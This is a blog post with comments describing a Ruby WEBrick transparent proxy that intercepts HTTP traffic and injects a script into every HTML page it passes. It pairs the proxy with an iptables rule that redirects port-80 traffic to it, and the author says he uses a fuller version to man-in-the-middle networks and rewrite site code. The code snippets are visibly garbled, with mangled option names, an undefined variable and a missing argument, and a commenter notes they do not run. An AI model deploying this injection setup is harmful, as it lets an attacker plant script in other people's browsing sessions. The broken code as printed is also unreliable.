FreedomCoder
I’ve search and search, asked Google, yahoo, sarasa search, and pretty much everyone else I know. Everything was incomplete, not well explain or not in subject at all. After many days of looking I found a japanese site, which I did not understood much of it but after I google translated I was able to check some code and learn how to capture the response body messages.
NOTE: As a word of advice, it is worth mentioning that this situation where only the Japanese have ruby code, has happened several times before with weird and undocumented methods or libraries. So it’s always good to look in google.jp for ruby code 
You may say why to even bother to do a Transparent proxy in ruby which is able to inject code, well maybe the answer is just because I want to see if I can do it.
I decided to do my PoC with the native library WEBrick, a simple and light HTTPserver among other things.
Simple Proxy :
The first thing I usually do is check the official site and Rdoc for the lib. Unluckily, I was only able to find how to do a normal proxy. and work with the request.
require 'webrick'
require 'webrick/httproxy'
WEBrick::HTTPProxyServer.new 
ort 8080,
:BindAddress => '0.0.0.0',
:ServerType => Thread,
:RequestCallback => Proc.new {|req,res| puts "#{req.unparsed_uri}" }
a.start
Simple Proxy server.
Fixing the URI :
With this we can setup Firefox, safari or any other web browser to use the proxy on localhost:8080 and Eureka, we have a proxy that will printout the unparsed_uri for our request.
This in theory works like a charm , but wait. If you see the request Firefox is doing the following
GET http://www.sarasa.com/ HTTP/1.1Browser request using a proxy server.
...
Normal the brower when requesting a page , will use HTTP/1.1 and use the header “Host” to specified the url and just connect using a:
GET / HTTP/1.1Browser request.
Host: www.sarasa.com
Having said this, here is the first wall I encounter. This is something that was undocumented: how do we turn our proxy into a transparent proxy?
The answer is simple. let’s modified our code and change the request. All the information is there we just have to re-write it to fit our need.
Before, we start we should know that our req is of type WEBrick::HTTPRequest. Knowing this we will do a little monkey patching to add a new method to the class and
require 'webrick'
require 'webrick/httproxy'
class WEBrick::HTTPRequest
def update_uri(uri)
@unparsed_uri = uri
@request_uri = parse_uri(uri)
end
end
req_call = Proc.new do |req,res|
req.update_uri()
puts "#{req.unparsed_uri}" }
end
WEBrick::HTTPProxyServer.new ort 8080,
:BindAddress => '0.0.0.0',
:ServerType => Thread,
:RequestCallback => req_call
a.startTransparent Proxy Server.
Injecting:
Well, a transparent proxy is cool , but we could do the same with squid or some other product. Let’s take it a little further and make it more interesting by adding an inject_payload to our response class.
require 'webrick'
require 'webrick/httproxy'
class WEBrick::HTTPRequest
def update_uri(uri)
@unparsed_uri = uri
@request_uri = parse_uri(uri)
end
end
class WEBrick::HTTPResponse
def inject_payload(string)
if @content_type =~ /html/
@body.gsub!( /<\/body>/ , "<script>#{string}</script></body>") # this is just
end
end
end
req_call = Proc.new do |req,res|
req.update_uri()
puts "#{req.unparsed_uri}" }
end
res_call = Proc.new do |req,res|
res.inject_payload("alert(\"P0wned\");")
end
WEBrick::HTTPProxyServer.new ort 8080,
:BindAddress => '0.0.0.0',
:ServerType => Thread,
:RequestCallback => req_call
roxyContentHandler => res_call
a.startInjectable Transparent Proxy server.
Last but not least :
Well, there is one more thing , but this is more at an operating system level we know want to reroute everything that is coming from the port 80 to port 8080 where our transparent proxy is listening. The following example shows a possible way to redirect HTTP traffic assuming that is coming from the interface eth0 and the proxy is listening on port 8080.
iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 80 -j REDIRECT –to-port 8080
Now we have a transparent proxy in our hands capable of injecting code into their request.
Enjoy.
If you enjoyed this article, please consider sharing it!
excelente post!
Ignoro que clase de payloads se puden inyectar en estos requests, pero lo que si me resultaria util es poder modificar el @user-agent para evitar que algunos sitios identifiquen mi Browser and O.S. cuando dejo comentarios.
Hay una forma mas facil:
==> http://www.beatnikpad.com/archives/2006/10/28/how-to-change-the-user-agent-in-firefox
Igualmente si se podria hacer editando el req['user-agent'] a “” y listo
Slds.
req.update_uri() provides 0 arguments, but “def update_uri(uri)” expects 1
Thanks. I should be something like.
req.update_uri("http://" + req["Host"] + req.unparsed_uri) unless req.unparsed_uri =~ /http:\/\//
Really useful post, was wondering if you could answer a couple questions..(found the webrick documentation to be a bit terse), how would you go about intercepting requests to a specific url and use that as a static file serve? And the other thing is how to best go about adding a rpc service to the proxy, so that requests to /my_rpc_service can be handled not by the proxy.
Any suggestions would be super helpful!
Thanks, Adam
This code doesn’t seem complete. There are several bugs in it. Have you actually seen this working?
The original post has a typo, which I made a comment with the corresponding fixed code. That might be one of the reasons why it does not work.
and Yes, it is meant to be a lame proof of concept on how to possibly implement a transparent proxy. OBVIOUSLY it is not meant to be fast or efficient, it will crash on a network with a lot of traffic. Having said this, I have a better and better implemented version that I constantly use as part of a tool I created to MiTM and replace website code on networks.